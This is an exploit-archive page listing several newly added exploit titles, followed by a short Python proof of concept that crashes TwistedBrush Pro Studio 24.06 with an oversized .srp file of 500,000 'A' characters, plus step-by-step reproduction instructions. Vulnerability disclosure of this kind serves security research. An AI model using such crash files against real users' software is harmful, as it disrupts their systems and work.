
9 changes to exploits/shellcodes Selfie Studio 2.17 - 'Resize Image' Denial of Service (PoC) TwistedBrush Pro Studio 24.06 - 'Resize Image' Denial of Service (PoC) TwistedBrush Pro Studio 24.06 - 'Script Recorder' Denial of Service (PoC) TwistedBrush Pro Studio 24.06 - '.srp' Denial of Service (PoC) PHP-Fusion 9.03.00 - 'Edit Profile' Remote Code Execution (Metasploit) Sales ERP 8.1 - Multiple SQL Injection D-Link DWL-2600AP - Multiple OS Command Injection Schneider Electric U.Motion Builder 1.3.4 - 'track_import_export.php object_id' Unauthenticated Command Injection PasteShr 1.6 - Multiple SQL Injection
20 lines
No EOL
706 B
Python
Executable file
20 lines
No EOL
706 B
Python
Executable file
# -*- coding: utf-8 -*-
|
|
# Exploit Title: TwistedBrush Pro Studio 24.06 - '.srp' Denial of Service (PoC)
|
|
# Date: 13/05/2019
|
|
# Author: Alejandra Sánchez
|
|
# Vendor Homepage: http://www.pixarra.com
|
|
# Software Link http://www.pixarra.com/uploads/9/4/6/3/94635436/tbrusha.exe
|
|
# Version: 24.06
|
|
# Tested on: Windows 10
|
|
|
|
# Proof of Concept:
|
|
# 1.- Run the python script "TwistedBrush_player.py", it will create a new file "sample.srp"
|
|
# 2.- Open TwistedBrush Pro Studio
|
|
# 3.- Go to 'Record' > 'Script Player...'
|
|
# 4.- Click 'Import' button, select the 'sample.srp' file created and click 'Open' button
|
|
# 5.- Crashed
|
|
|
|
buffer = "\x41" * 500000
|
|
f = open ("sample.srp", "w")
|
|
f.write(buffer)
|
|
f.close() |